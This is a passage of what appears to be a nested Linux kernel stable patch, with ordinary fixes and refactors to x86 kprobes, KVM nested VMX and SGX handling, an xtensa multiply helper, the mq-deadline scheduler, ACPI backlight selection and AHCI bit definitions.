+ #include <linux/objtool.h>
+ #include <linux/pgtable.h>
+@@ -279,19 +280,6 @@ static int insn_is_indirect_jump(struct insn *insn)
+ 	return ret;
+ }
+ 
+-static bool is_padding_int3(unsigned long addr, unsigned long eaddr)
+-{
+-	unsigned char ops;
+-
+-	for (; addr < eaddr; addr++) {
+-		if (get_kernel_nofault(ops, (void *)addr) < 0 ||
+-		    ops != INT3_INSN_OPCODE)
+-			return false;
+-	}
+-
+-	return true;
+-}
+-
+ /* Decode whole function to ensure any instructions don't jump into target */
+ static int can_optimize(unsigned long paddr)
+ {
+@@ -334,15 +322,15 @@ static int can_optimize(unsigned long paddr)
+ 		ret = insn_decode_kernel(&insn, (void *)recovered_insn);
+ 		if (ret < 0)
+ 			return 0;
+-
++#ifdef CONFIG_KGDB
+ 		/*
+-		 * In the case of detecting unknown breakpoint, this could be
+-		 * a padding INT3 between functions. Let's check that all the
+-		 * rest of the bytes are also INT3.
++		 * If there is a dynamically installed kgdb sw breakpoint,
++		 * this function should not be probed.
+ 		 */
+-		if (insn.opcode.bytes[0] == INT3_INSN_OPCODE)
+-			return is_padding_int3(addr, paddr - offset + size) ? 1 : 0;
+-
++		if (insn.opcode.bytes[0] == INT3_INSN_OPCODE &&
++		    kgdb_has_hit_break(addr))
++			return 0;
++#endif
+ 		/* Recover address */
+ 		insn.kaddr = (void *)addr;
+ 		insn.next_byte = (void *)(addr + insn.length);
+diff --git a/arch/x86/kvm/lapic.c b/arch/x86/kvm/lapic.c
+index d7639d126e6c7..bf5ce862c4daf 100644
+--- a/arch/x86/kvm/lapic.c
++++ b/arch/x86/kvm/lapic.c
+@@ -2722,8 +2722,6 @@ static int kvm_apic_state_fixup(struct kvm_vcpu *vcpu,
+ 			icr = __kvm_lapic_get_reg64(s->regs, APIC_ICR);
+ 			__kvm_lapic_set_reg(s->regs, APIC_ICR2, icr >> 32);
+ 		}
+-	} else {
+-		kvm_lapic_xapic_id_updated(vcpu->arch.apic);
+ 	}
+ 
+ 	return 0;
+@@ -2759,6 +2757,9 @@ int kvm_apic_set_state(struct kvm_vcpu *vcpu, struct kvm_lapic_state *s)
+ 	}
+ 	memcpy(vcpu->arch.apic->regs, s->regs, sizeof(*s));
+ 
++	if (!apic_x2apic_mode(apic))
++		kvm_lapic_xapic_id_updated(apic);
++
+ 	atomic_set_release(&apic->vcpu->kvm->arch.apic_map_dirty, DIRTY);
+ 	kvm_recalculate_apic_map(vcpu->kvm);
+ 	kvm_apic_set_version(vcpu);
+diff --git a/arch/x86/kvm/vmx/nested.c b/arch/x86/kvm/vmx/nested.c
+index 5b0d4859e4b78..10c63b1bf92fa 100644
+--- a/arch/x86/kvm/vmx/nested.c
++++ b/arch/x86/kvm/vmx/nested.c
+@@ -5100,24 +5100,35 @@ static int handle_vmxon(struct kvm_vcpu *vcpu)
+ 		| FEAT_CTL_VMX_ENABLED_OUTSIDE_SMX;
+ 
+ 	/*
+-	 * Note, KVM cannot rely on hardware to perform the CR0/CR4 #UD checks
+-	 * that have higher priority than VM-Exit (see Intel SDM's pseudocode
+-	 * for VMXON), as KVM must load valid CR0/CR4 values into hardware while
+-	 * running the guest, i.e. KVM needs to check the _guest_ values.
++	 * Manually check CR4.VMXE checks, KVM must force CR4.VMXE=1 to enter
++	 * the guest and so cannot rely on hardware to perform the check,
++	 * which has higher priority than VM-Exit (see Intel SDM's pseudocode
++	 * for VMXON).
+ 	 *
+-	 * Rely on hardware for the other two pre-VM-Exit checks, !VM86 and
+-	 * !COMPATIBILITY modes.  KVM may run the guest in VM86 to emulate Real
+-	 * Mode, but KVM will never take the guest out of those modes.
++	 * Rely on hardware for the other pre-VM-Exit checks, CR0.PE=1, !VM86
++	 * and !COMPATIBILITY modes.  For an unrestricted guest, KVM doesn't
++	 * force any of the relevant guest state.  For a restricted guest, KVM
++	 * does force CR0.PE=1, but only to also force VM86 in order to emulate
++	 * Real Mode, and so there's no need to check CR0.PE manually.
+ 	 */
+-	if (!nested_host_cr0_valid(vcpu, kvm_read_cr0(vcpu)) ||
+-	    !nested_host_cr4_valid(vcpu, kvm_read_cr4(vcpu))) {
++	if (!kvm_read_cr4_bits(vcpu, X86_CR4_VMXE)) {
+ 		kvm_queue_exception(vcpu, UD_VECTOR);
+ 		return 1;
+ 	}
+ 
+ 	/*
+-	 * CPL=0 and all other checks that are lower priority than VM-Exit must
+-	 * be checked manually.
++	 * The CPL is checked for "not in VMX operation" and for "in VMX root",
++	 * and has higher priority than the VM-Fail due to being post-VMXON,
++	 * i.e. VMXON #GPs outside of VMX non-root if CPL!=0.  In VMX non-root,
++	 * VMXON causes VM-Exit and KVM unconditionally forwards VMXON VM-Exits
++	 * from L2 to L1, i.e. there's no need to check for the vCPU being in
++	 * VMX non-root.
++	 *
++	 * Forwarding the VM-Exit unconditionally, i.e. without performing the
++	 * #UD checks (see above), is functionally ok because KVM doesn't allow
++	 * L1 to run L2 without CR4.VMXE=0, and because KVM never modifies L2's
++	 * CR0 or CR4, i.e. it's L2's responsibility to emulate #UDs that are
++	 * missed by hardware due to shadowing CR0 and/or CR4.
+ 	 */
+ 	if (vmx_get_cpl(vcpu)) {
+ 		kvm_inject_gp(vcpu, 0);
+@@ -5127,6 +5138,17 @@ static int handle_vmxon(struct kvm_vcpu *vcpu)
+ 	if (vmx->nested.vmxon)
+ 		return nested_vmx_fail(vcpu, VMXERR_VMXON_IN_VMX_ROOT_OPERATION);
+ 
++	/*
++	 * Invalid CR0/CR4 generates #GP.  These checks are performed if and
++	 * only if the vCPU isn't already in VMX operation, i.e. effectively
++	 * have lower priority than the VM-Fail above.
++	 */
++	if (!nested_host_cr0_valid(vcpu, kvm_read_cr0(vcpu)) ||
++	    !nested_host_cr4_valid(vcpu, kvm_read_cr4(vcpu))) {
++		kvm_inject_gp(vcpu, 0);
++		return 1;
++	}
++
+ 	if ((vmx->msr_ia32_feature_control & VMXON_NEEDED_FEATURES)
+ 			!= VMXON_NEEDED_FEATURES) {
+ 		kvm_inject_gp(vcpu, 0);
+@@ -6808,7 +6830,8 @@ void nested_vmx_setup_ctls_msrs(struct vmcs_config *vmcs_conf, u32 ept_caps)
+ 		SECONDARY_EXEC_ENABLE_INVPCID |
+ 		SECONDARY_EXEC_RDSEED_EXITING |
+ 		SECONDARY_EXEC_XSAVES |
+-		SECONDARY_EXEC_TSC_SCALING;
++		SECONDARY_EXEC_TSC_SCALING |
++		SECONDARY_EXEC_ENABLE_USR_WAIT_PAUSE;
+ 
+ 	/*
+ 	 * We can emulate "VMCS shadowing," even if the hardware
+diff --git a/arch/x86/kvm/vmx/sgx.c b/arch/x86/kvm/vmx/sgx.c
+index 8f95c7c014335..b12da2a6dec95 100644
+--- a/arch/x86/kvm/vmx/sgx.c
++++ b/arch/x86/kvm/vmx/sgx.c
+@@ -182,8 +182,10 @@ static int __handle_encls_ecreate(struct kvm_vcpu *vcpu,
+ 	/* Enforce CPUID restriction on max enclave size. */
+ 	max_size_log2 = (attributes & SGX_ATTR_MODE64BIT) ? sgx_12_0->edx >> 8 :
+ 							    sgx_12_0->edx;
+-	if (size >= BIT_ULL(max_size_log2))
++	if (size >= BIT_ULL(max_size_log2)) {
+ 		kvm_inject_gp(vcpu, 0);
++		return 1;
++	}
+ 
+ 	/*
+ 	 * sgx_virt_ecreate() returns:
+diff --git a/arch/xtensa/kernel/xtensa_ksyms.c b/arch/xtensa/kernel/xtensa_ksyms.c
+index b0bc8897c924f..2a31b1ab0c9f2 100644
+--- a/arch/xtensa/kernel/xtensa_ksyms.c
++++ b/arch/xtensa/kernel/xtensa_ksyms.c
+@@ -62,6 +62,7 @@ extern int __modsi3(int, int);
+ extern int __mulsi3(int, int);
+ extern unsigned int __udivsi3(unsigned int, unsigned int);
+ extern unsigned int __umodsi3(unsigned int, unsigned int);
++extern unsigned long long __umulsidi3(unsigned int, unsigned int);
+ 
+ EXPORT_SYMBOL(__ashldi3);
+ EXPORT_SYMBOL(__ashrdi3);
+@@ -71,6 +72,7 @@ EXPORT_SYMBOL(__modsi3);
+ EXPORT_SYMBOL(__mulsi3);
+ EXPORT_SYMBOL(__udivsi3);
+ EXPORT_SYMBOL(__umodsi3);
++EXPORT_SYMBOL(__umulsidi3);
+ 
+ unsigned int __sync_fetch_and_and_4(volatile void *p, unsigned int v)
+ {
+diff --git a/arch/xtensa/lib/Makefile b/arch/xtensa/lib/Makefile
+index d4e9c397e3fde..7ecef0519a27c 100644
+--- a/arch/xtensa/lib/Makefile
++++ b/arch/xtensa/lib/Makefile
+@@ -5,7 +5,7 @@
+ 
+ lib-y	+= memcopy.o memset.o checksum.o \
+ 	   ashldi3.o ashrdi3.o lshrdi3.o \
+-	   divsi3.o udivsi3.o modsi3.o umodsi3.o mulsi3.o \
++	   divsi3.o udivsi3.o modsi3.o umodsi3.o mulsi3.o umulsidi3.o \
+ 	   usercopy.o strncpy_user.o strnlen_user.o
+ lib-$(CONFIG_PCI) += pci-auto.o
+ lib-$(CONFIG_KCSAN) += kcsan-stubs.o
+diff --git a/arch/xtensa/lib/umulsidi3.S b/arch/xtensa/lib/umulsidi3.S
+new file mode 100644
+index 0000000000000..1360816479427
+--- /dev/null
++++ b/arch/xtensa/lib/umulsidi3.S
+@@ -0,0 +1,230 @@
++/* SPDX-License-Identifier: GPL-2.0-or-later WITH GCC-exception-2.0 */
++#include <linux/linkage.h>
++#include <asm/asmmacro.h>
++#include <asm/core.h>
++
++#if !XCHAL_HAVE_MUL16 && !XCHAL_HAVE_MUL32 && !XCHAL_HAVE_MAC16
++#define XCHAL_NO_MUL 1
++#endif
++
++ENTRY(__umulsidi3)
++
++#ifdef __XTENSA_CALL0_ABI__
++	abi_entry(32)
++	s32i	a12, sp, 16
++	s32i	a13, sp, 20
++	s32i	a14, sp, 24
++	s32i	a15, sp, 28
++#elif XCHAL_NO_MUL
++	/* This is not really a leaf function; allocate enough stack space
++	   to allow CALL12s to a helper function.  */
++	abi_entry(32)
++#else
++	abi_entry_default
++#endif
++
++#ifdef __XTENSA_EB__
++#define wh a2
++#define wl a3
++#else
++#define wh a3
++#define wl a2
++#endif /* __XTENSA_EB__ */
++
++	/* This code is taken from the mulsf3 routine in ieee754-sf.S.
++	   See more comments there.  */
++
++#if XCHAL_HAVE_MUL32_HIGH
++	mull	a6, a2, a3
++	muluh	wh, a2, a3
++	mov	wl, a6
++
++#else /* ! MUL32_HIGH */
++
++#if defined(__XTENSA_CALL0_ABI__) && XCHAL_NO_MUL
++	/* a0 and a8 will be clobbered by calling the multiply function
++	   but a8 is not used here and need not be saved.  */
++	s32i	a0, sp, 0
++#endif
++
++#if XCHAL_HAVE_MUL16 || XCHAL_HAVE_MUL32
++
++#define a2h a4
++#define a3h a5
++
++	/* Get the high halves of the inputs into registers.  */
++	srli	a2h, a2, 16
++	srli	a3h, a3, 16
++
++#define a2l a2
++#define a3l a3
++
++#if XCHAL_HAVE_MUL32 && !XCHAL_HAVE_MUL16
++	/* Clear the high halves of the inputs.  This does not matter
++	   for MUL16 because the high bits are ignored.  */
++	extui	a2, a2, 0, 16
++	extui	a3, a3, 0, 16
++#endif
++#endif /* MUL16 || MUL32 */
++
++
++#if XCHAL_HAVE_MUL16
++
++#define do_mul(dst, xreg, xhalf, yreg, yhalf) \
++	mul16u	dst, xreg ## xhalf, yreg ## yhalf
++
++#elif XCHAL_HAVE_MUL32
++
++#define do_mul(dst, xreg, xhalf, yreg, yhalf) \
++	mull	dst, xreg ## xhalf, yreg ## yhalf
++
++#elif XCHAL_HAVE_MAC16
++
++/* The preprocessor insists on inserting a space when concatenating after
++   a period in the definition of do_mul below.  These macros are a workaround
++   using underscores instead of periods when doing the concatenation.  */
++#define umul_aa_ll umul.aa.ll
++#define umul_aa_lh umul.aa.lh
++#define umul_aa_hl umul.aa.hl
++#define umul_aa_hh umul.aa.hh
++
++#define do_mul(dst, xreg, xhalf, yreg, yhalf) \
++	umul_aa_ ## xhalf ## yhalf	xreg, yreg; \
++	rsr	dst, ACCLO
++
++#else /* no multiply hardware */
++
++#define set_arg_l(dst, src) \
++	extui	dst, src, 0, 16
++#define set_arg_h(dst, src) \
++	srli	dst, src, 16
++
++#ifdef __XTENSA_CALL0_ABI__
++#define do_mul(dst, xreg, xhalf, yreg, yhalf) \
++	set_arg_ ## xhalf (a13, xreg); \
++	set_arg_ ## yhalf (a14, yreg); \
++	call0	.Lmul_mulsi3; \
++	mov	dst, a12
++#else
++#define do_mul(dst, xreg, xhalf, yreg, yhalf) \
++	set_arg_ ## xhalf (a14, xreg); \
++	set_arg_ ## yhalf (a15, yreg); \
++	call12	.Lmul_mulsi3; \
++	mov	dst, a14
++#endif /* __XTENSA_CALL0_ABI__ */
++
++#endif /* no multiply hardware */
++
++	/* Add pp1 and pp2 into a6 with carry-out in a9.  */
++	do_mul(a6, a2, l, a3, h)	/* pp 1 */
++	do_mul(a11, a2, h, a3, l)	/* pp 2 */
++	movi	a9, 0
++	add	a6, a6, a11
++	bgeu	a6, a11, 1f
++	addi	a9, a9, 1
++1:
++	/* Shift the high half of a9/a6 into position in a9.  Note that
++	   this value can be safely incremented without any carry-outs.  */
++	ssai	16
++	src	a9, a9, a6
++
++	/* Compute the low word into a6.  */
++	do_mul(a11, a2, l, a3, l)	/* pp 0 */
++	sll	a6, a6
++	add	a6, a6, a11
++	bgeu	a6, a11, 1f
++	addi	a9, a9, 1
++1:
++	/* Compute the high word into wh.  */
++	do_mul(wh, a2, h, a3, h)	/* pp 3 */
++	add	wh, wh, a9
++	mov	wl, a6
++
++#endif /* !MUL32_HIGH */
++
++#if defined(__XTENSA_CALL0_ABI__) && XCHAL_NO_MUL
++	/* Restore the original return address.  */
++	l32i	a0, sp, 0
++#endif
++#ifdef __XTENSA_CALL0_ABI__
++	l32i	a12, sp, 16
++	l32i	a13, sp, 20
++	l32i	a14, sp, 24
++	l32i	a15, sp, 28
++	abi_ret(32)
++#else
++	abi_ret_default
++#endif
++
++#if XCHAL_NO_MUL
++
++	.macro	do_addx2 dst, as, at, tmp
++#if XCHAL_HAVE_ADDX
++	addx2	\dst, \as, \at
++#else
++	slli	\tmp, \as, 1
++	add	\dst, \tmp, \at
++#endif
++	.endm
++
++	.macro	do_addx4 dst, as, at, tmp
++#if XCHAL_HAVE_ADDX
++	addx4	\dst, \as, \at
++#else
++	slli	\tmp, \as, 2
++	add	\dst, \tmp, \at
++#endif
++	.endm
++
++	.macro	do_addx8 dst, as, at, tmp
++#if XCHAL_HAVE_ADDX
++	addx8	\dst, \as, \at
++#else
++	slli	\tmp, \as, 3
++	add	\dst, \tmp, \at
++#endif
++	.endm
++
++	/* For Xtensa processors with no multiply hardware, this simplified
++	   version of _mulsi3 is used for multiplying 16-bit chunks of
++	   the floating-point mantissas.  When using CALL0, this function
++	   uses a custom ABI: the inputs are passed in a13 and a14, the
++	   result is returned in a12, and a8 and a15 are clobbered.  */
++	.align	4
++.Lmul_mulsi3:
++	abi_entry_default
++
++	.macro mul_mulsi3_body dst, src1, src2, tmp1, tmp2
++	movi	\dst, 0
++1:	add	\tmp1, \src2, \dst
++	extui	\tmp2, \src1, 0, 1
++	movnez	\dst, \tmp1, \tmp2
++
++	do_addx2 \tmp1, \src2, \dst, \tmp1
++	extui	\tmp2, \src1, 1, 1
++	movnez	\dst, \tmp1, \tmp2
++
++	do_addx4 \tmp1, \src2, \dst, \tmp1
++	extui	\tmp2, \src1, 2, 1
++	movnez	\dst, \tmp1, \tmp2
++
++	do_addx8 \tmp1, \src2, \dst, \tmp1
++	extui	\tmp2, \src1, 3, 1
++	movnez	\dst, \tmp1, \tmp2
++
++	srli	\src1, \src1, 4
++	slli	\src2, \src2, 4
++	bnez	\src1, 1b
++	.endm
++
++#ifdef __XTENSA_CALL0_ABI__
++	mul_mulsi3_body a12, a13, a14, a15, a8
++#else
++	/* The result will be written into a2, so save that argument in a4.  */
++	mov	a4, a2
++	mul_mulsi3_body a2, a4, a3, a5, a6
++#endif
++	abi_ret_default
++#endif /* XCHAL_NO_MUL */
++
++ENDPROC(__umulsidi3)
+diff --git a/block/mq-deadline.c b/block/mq-deadline.c
+index 5639921dfa922..6672f1bce3795 100644
+--- a/block/mq-deadline.c
++++ b/block/mq-deadline.c
+@@ -130,6 +130,20 @@ static u8 dd_rq_ioclass(struct request *rq)
+ 	return IOPRIO_PRIO_CLASS(req_get_ioprio(rq));
+ }
+ 
++/*
++ * get the request before `rq' in sector-sorted order
++ */
++static inline struct request *
++deadline_earlier_request(struct request *rq)
++{
++	struct rb_node *node = rb_prev(&rq->rb_node);
++
++	if (node)
++		return rb_entry_rq(node);
++
++	return NULL;
++}
++
+ /*
+  * get the request after `rq' in sector-sorted order
+  */
+@@ -277,6 +291,39 @@ static inline int deadline_check_fifo(struct dd_per_prio *per_prio,
+ 	return 0;
+ }
+ 
++/*
++ * Check if rq has a sequential request preceding it.
++ */
++static bool deadline_is_seq_writes(struct deadline_data *dd, struct request *rq)
++{
++	struct request *prev = deadline_earlier_request(rq);
++
++	if (!prev)
++		return false;
++
++	return blk_rq_pos(prev) + blk_rq_sectors(prev) == blk_rq_pos(rq);
++}
++
++/*
++ * Skip all write requests that are sequential from @rq, even if we cross
++ * a zone boundary.
++ */
++static struct request *deadline_skip_seq_writes(struct deadline_data *dd,
++						struct request *rq)
++{
++	sector_t pos = blk_rq_pos(rq);
++	sector_t skipped_sectors = 0;
++
++	while (rq) {
++		if (blk_rq_pos(rq) != pos + skipped_sectors)
++			break;
++		skipped_sectors += blk_rq_sectors(rq);
++		rq = deadline_latter_request(rq);
++	}
++
++	return rq;
++}
++
+ /*
+  * For the specified data direction, return the next request to
+  * dispatch using arrival ordered lists.
+@@ -297,11 +344,16 @@ deadline_fifo_request(struct deadline_data *dd, struct dd_per_prio *per_prio,
+ 
+ 	/*
+ 	 * Look for a write request that can be dispatched, that is one with
+-	 * an unlocked target zone.
++	 * an unlocked target zone. For some HDDs, breaking a sequential
++	 * write stream can lead to lower throughput, so make sure to preserve
++	 * sequential write streams, even if that stream crosses into the next
++	 * zones and these zones are unlocked.
+ 	 */
+ 	spin_lock_irqsave(&dd->zone_lock, flags);
+ 	list_for_each_entry(rq, &per_prio->fifo_list[DD_WRITE], queuelist) {
+-		if (blk_req_can_dispatch_to_zone(rq))
++		if (blk_req_can_dispatch_to_zone(rq) &&
++		    (blk_queue_nonrot(rq->q) ||
++		     !deadline_is_seq_writes(dd, rq)))
+ 			goto out;
+ 	}
+ 	rq = NULL;
+@@ -331,13 +383,19 @@ deadline_next_request(struct deadline_data *dd, struct dd_per_prio *per_prio,
+ 
+ 	/*
+ 	 * Look for a write request that can be dispatched, that is one with
+-	 * an unlocked target zone.
++	 * an unlocked target zone. For some HDDs, breaking a sequential
++	 * write stream can lead to lower throughput, so make sure to preserve
++	 * sequential write streams, even if that stream crosses into the next
++	 * zones and these zones are unlocked.
+ 	 */
+ 	spin_lock_irqsave(&dd->zone_lock, flags);
+ 	while (rq) {
+ 		if (blk_req_can_dispatch_to_zone(rq))
+ 			break;
+-		rq = deadline_latter_request(rq);
++		if (blk_queue_nonrot(rq->q))
++			rq = deadline_latter_request(rq);
++		else
++			rq = deadline_skip_seq_writes(dd, rq);
+ 	}
+ 	spin_unlock_irqrestore(&dd->zone_lock, flags);
+ 
+@@ -789,6 +847,18 @@ static void dd_prepare_request(struct request *rq)
+ 	rq->elv.priv[0] = NULL;
+ }
+ 
++static bool dd_has_write_work(struct blk_mq_hw_ctx *hctx)
++{
++	struct deadline_data *dd = hctx->queue->elevator->elevator_data;
++	enum dd_prio p;
++
++	for (p = 0; p <= DD_PRIO_MAX; p++)
++		if (!list_empty_careful(&dd->per_prio[p].fifo_list[DD_WRITE]))
++			return true;
++
++	return false;
++}
++
+ /*
+  * Callback from inside blk_mq_free_request().
+  *
+@@ -828,9 +898,10 @@ static void dd_finish_request(struct request *rq)
+ 
+ 		spin_lock_irqsave(&dd->zone_lock, flags);
+ 		blk_req_zone_write_unlock(rq);
+-		if (!list_empty(&per_prio->fifo_list[DD_WRITE]))
+-			blk_mq_sched_mark_restart_hctx(rq->mq_hctx);
+ 		spin_unlock_irqrestore(&dd->zone_lock, flags);
++
++		if (dd_has_write_work(rq->mq_hctx))
++			blk_mq_sched_mark_restart_hctx(rq->mq_hctx);
+ 	}
+ }
+ 
+diff --git a/drivers/acpi/video_detect.c b/drivers/acpi/video_detect.c
+index 13f10fbcd7f03..76b7e7f8894e7 100644
+--- a/drivers/acpi/video_detect.c
++++ b/drivers/acpi/video_detect.c
+@@ -734,6 +734,16 @@ static bool google_cros_ec_present(void)
+ 	return acpi_dev_found("GOOG0004") || acpi_dev_found("GOOG000C");
+ }
+ 
++/*
++ * Windows 8 and newer no longer use the ACPI video interface, so it often
++ * does not work. So on win8+ systems prefer native brightness control.
++ * Chromebooks should always prefer native backlight control.
++ */
++static bool prefer_native_over_acpi_video(void)
++{
++	return acpi_osi_is_win8() || google_cros_ec_present();
++}
++
+ /*
+  * Determine which type of backlight interface to use on this system,
+  * First check cmdline, then dmi quirks, then do autodetect.
+@@ -779,28 +789,16 @@ static enum acpi_backlight_type __acpi_video_get_backlight_type(bool native)
+ 	if (apple_gmux_backlight_present())
+ 		return acpi_backlight_apple_gmux;
+ 
+-	/* Chromebooks should always prefer native backlight control. */
+-	if (google_cros_ec_present() && native_available)
+-		return acpi_backlight_native;
++	/* Use ACPI video if available, except when native should be preferred. */
++	if ((video_caps & ACPI_VIDEO_BACKLIGHT) &&
++	     !(native_available && prefer_native_over_acpi_video()))
++		return acpi_backlight_video;
+ 
+-	/* On systems with ACPI video use either native or ACPI video. */
+-	if (video_caps & ACPI_VIDEO_BACKLIGHT) {
+-		/*
+-		 * Windows 8 and newer no longer use the ACPI video interface,
+-		 * so it often does not work. If the ACPI tables are written
+-		 * for win8 and native brightness ctl is available, use that.
+-		 *
+-		 * The native check deliberately is inside the if acpi-video
+-		 * block on older devices without acpi-video support native
+-		 * is usually not the best choice.
+-		 */
+-		if (acpi_osi_is_win8() && native_available)
+-			return acpi_backlight_native;
+-		else
+-			return acpi_backlight_video;
+-	}
++	/* Use native if available */
++	if (native_available)
++		return acpi_backlight_native;
+ 
+-	/* No ACPI video (old hw), use vendor specific fw methods. */
++	/* No ACPI video/native (old hw), use vendor specific fw methods. */
+ 	return acpi_backlight_vendor;
+ }
+ 
+@@ -812,18 +810,6 @@ EXPORT_SYMBOL(acpi_video_get_backlight_type);
+ 
+ bool acpi_video_backlight_use_native(void)
+ {
+-	/*
+-	 * Call __acpi_video_get_backlight_type() to let it know that
+-	 * a native backlight is available.
+-	 */
+-	__acpi_video_get_backlight_type(true);
+-
+-	/*
+-	 * For now just always return true. There is a whole bunch of laptop
+-	 * models where (video_caps & ACPI_VIDEO_BACKLIGHT) is false causing
+-	 * __acpi_video_get_backlight_type() to return vendor, while these
+-	 * models only have a native backlight control.
+-	 */
+-	return true;
++	return __acpi_video_get_backlight_type(true) == acpi_backlight_native;
+ }
+ EXPORT_SYMBOL(acpi_video_backlight_use_native);
+diff --git a/drivers/ata/ahci.h b/drivers/ata/ahci.h
+index 7add8e79912b1..ff8e6ae1c6362 100644
+--- a/drivers/ata/ahci.h
++++ b/drivers/ata/ahci.h
+@@ -24,6 +24,7 @@
+ #include <linux/libata.h>
+ #include <linux/phy/phy.h>
+ #include <linux/regulator/consumer.h>
++#include <linux/bits.h>
+ 
+ /* Enclosure Management Control */
+ #define EM_CTRL_MSG_TYPE              0x000f0000
+@@ -53,12 +54,12 @@ enum {
+ 	AHCI_PORT_PRIV_FBS_DMA_SZ	= AHCI_CMD_SLOT_SZ +
+ 					  AHCI_CMD_TBL_AR_SZ +
+ 					  (AHCI_RX_FIS_SZ * 16),
+-	AHCI_IRQ_ON_SG		= (1 << 31),
+-	AHCI_CMD_ATAPI		= (1 << 5),
+-	AHCI_CMD_WRITE		= (1 << 6),
+-	AHCI_CMD_PREFETCH	= (1 << 7),
+-	AHCI_CMD_RESET		= (1 << 8),
+-	AHCI_CMD_CLR_BUSY	= (1 << 10),
++	AHCI_IRQ_ON_SG		= BIT(31),
++	AHCI_CMD_ATAPI		= BIT(5),
++	AHCI_CMD_WRITE		= BIT(6),
++	AHCI_CMD_PREFETCH	= BIT(7),
++	AHCI_CMD_RESET		= BIT(8),
++	AHCI_CMD_CLR_BUSY	= BIT(10),
+ 
+ 	RX_FIS_PIO_SETUP	= 0x20,	/* offset of PIO Setup FIS data */
+ 	RX_FIS_D2H_REG		= 0x40,	/* offset of D2H Register FIS data */
+@@ -76,37 +77,37 @@ enum {
+ 	HOST_CAP2		= 0x24, /* host capabilities, extended */
+ 
+ 	/* HOST_CTL bits */
+-	HOST_RESET		= (1 << 0),  /* reset controller; self-clear */
+-	HOST_IRQ_EN		= (1 << 1),  /* global IRQ enable */
+-	HOST_MRSM		= (1 << 2),  /* MSI Revert to Single Message */
+-	HOST_AHCI_EN		= (1 << 31), /* AHCI enabled */
++	HOST_RESET		= BIT(0),  /* reset controller; self-clear */
++	HOST_IRQ_EN		= BIT(1),  /* global IRQ enable */
++	HOST_MRSM		= BIT(2),  /* MSI Revert to Single Message */
++	HOST_AHCI_EN		= BIT(31), /* AHCI enabled */
+ 
+ 	/* HOST_CAP bits */
+-	HOST_CAP_SXS		= (1 << 5),  /* Supports External SATA */
+-	HOST_CAP_EMS		= (1 << 6),  /* Enclosure Management support */
+-	HOST_CAP_CCC		= (1 << 7),  /* Command Completion Coalescing */
+-	HOST_CAP_PART		= (1 << 13), /* Partial state capable */
+-	HOST_CAP_SSC		= (1 << 14), /* Slumber state capable */
+-	HOST_CAP_PIO_MULTI	= (1 << 15), /* PIO multiple DRQ support */
+-	HOST_CAP_FBS		= (1 << 16), /* FIS-based switching support */
+-	HOST_CAP_PMP		= (1 << 17), /* Port Multiplier support */
+-	HOST_CAP_ONLY		= (1 << 18), /* Supports AHCI mode only */
+-	HOST_CAP_CLO		= (1 << 24), /* Command List Override support */
+-	HOST_CAP_LED		= (1 << 25), /* Supports activity LED */
+-	HOST_CAP_ALPM		= (1 << 26), /* Aggressive Link PM support */
+-	HOST_CAP_SSS		= (1 << 27), /* Staggered Spin-up */
+-	HOST_CAP_MPS		= (1 << 28), /* Mechanical presence switch */
+-	HOST_CAP_SNTF		= (1 << 29), /* SNotification register */
+-	HOST_CAP_NCQ		= (1 << 30), /* Native Command Queueing */
+-	HOST_CAP_64		= (1 << 31), /* PCI DAC (64-bit DMA) support */
++	HOST_CAP_SXS		= BIT(5),  /* Supports External SATA */
++	HOST_CAP_EMS		= BIT(6),  /* Enclosure Management support */
++	HOST_CAP_CCC		= BIT(7),  /* Command Completion Coalescing */
++	HOST_CAP_PART		= BIT(13), /* Partial state capable */
++	HOST_CAP_SSC		= BIT(14), /* Slumber state capable */
++	HOST_CAP_PIO_MULTI	= BIT(15), /* PIO multiple DRQ support */
++	HOST_CAP_FBS		= BIT(16), /* FIS-based switching support */
++	HOST_CAP_PMP		= BIT(17), /* Port Multiplier support */
++	HOST_CAP_ONLY		= BIT(18), /* Supports AHCI mode only */
++	HOST_CAP_CLO		= BIT(24), /* Command List Override support */
++	HOST_CAP_LED		= BIT(25), /* Supports activity LED */
++	HOST_CAP_ALPM		= BIT(26), /* Aggressive Link PM support */
++	HOST_CAP_SSS		= BIT(27), /* Staggered Spin-up */
++	HOST_CAP_MPS		= BIT(28), /* Mechanical presence switch */
++	HOST_CAP_SNTF		= BIT(29), /* SNotification register */
++	HOST_CAP_NCQ		= BIT(30), /* Native Command Queueing */
++	HOST_CAP_64		= BIT(31), /* PCI DAC (64-bit DMA) support */
+ 
+ 	/* HOST_CAP2 bits */
+-	HOST_CAP2_BOH		= (1 << 0),  /* BIOS/OS handoff supported */
+-	HOST_CAP2_NVMHCI	= (1 << 1),  /* NVMHCI supported */
+-	HOST_CAP2_APST		= (1 << 2),  /* Automatic partial to slumber */
+-	HOST_CAP2_SDS		= (1 << 3),  /* Support device sleep */
+-	HOST_CAP2_SADM		= (1 << 4),  /* Support aggressive DevSlp */
+-	HOST_CAP2_DESO		= (1 << 5),  /* DevSlp from slumber only */
++	HOST_CAP2_BOH		= BIT(0),  /* BIOS/OS handoff supported */
++	HOST_CAP2_NVMHCI	= BIT(1),  /* NVMHCI supported */
++	HOST_CAP2_APST		= BIT(2),  /* Automatic partial to slumber */
++	HOST_CAP2_SDS		= BIT(3),  /* Support device sleep */
++	HOST_CAP2_SADM		= BIT(4),  /* Support aggressive DevSlp */
++	HOST_CAP2_DESO		= BIT(5),  /* DevSlp from slumber only */
+ 
+ 	/* registers for each SATA port */
+ 	PORT_LST_ADDR		= 0x00, /* command list DMA addr */
+@@ -128,24 +129,24 @@ enum {
+ 	PORT_DEVSLP		= 0x44, /* device sleep */
+ 
+ 	/* PORT_IRQ_{STAT,MASK} bits */
+-	PORT_IRQ_COLD_PRES	= (1 << 31), /* cold presence detect */
+-	PORT_IRQ_TF_ERR		= (1 << 30), /* task file error */
+-	PORT_IRQ_HBUS_ERR	= (1 << 29), /* host bus fatal error */
+-	PORT_IRQ_HBUS_DATA_ERR	= (1 << 28), /* host bus data error */
+-	PORT_IRQ_IF_ERR		= (1 << 27), /* interface fatal error */
+-	PORT_IRQ_IF_NONFATAL	= (1 << 26), /* interface non-fatal error */
+-	PORT_IRQ_OVERFLOW	= (1 << 24), /* xfer exhausted available S/G */
+-	PORT_IRQ_BAD_PMP	= (1 << 23), /* incorrect port multiplier */
+-
+-	PORT_IRQ_PHYRDY		= (1 << 22), /* PhyRdy changed */
+-	PORT_IRQ_DMPS		= (1 << 7), /* mechanical presence status */
+-	PORT_IRQ_CONNECT	= (1 << 6), /* port connect change status */
+-	PORT_IRQ_SG_DONE	= (1 << 5), /* descriptor processed */
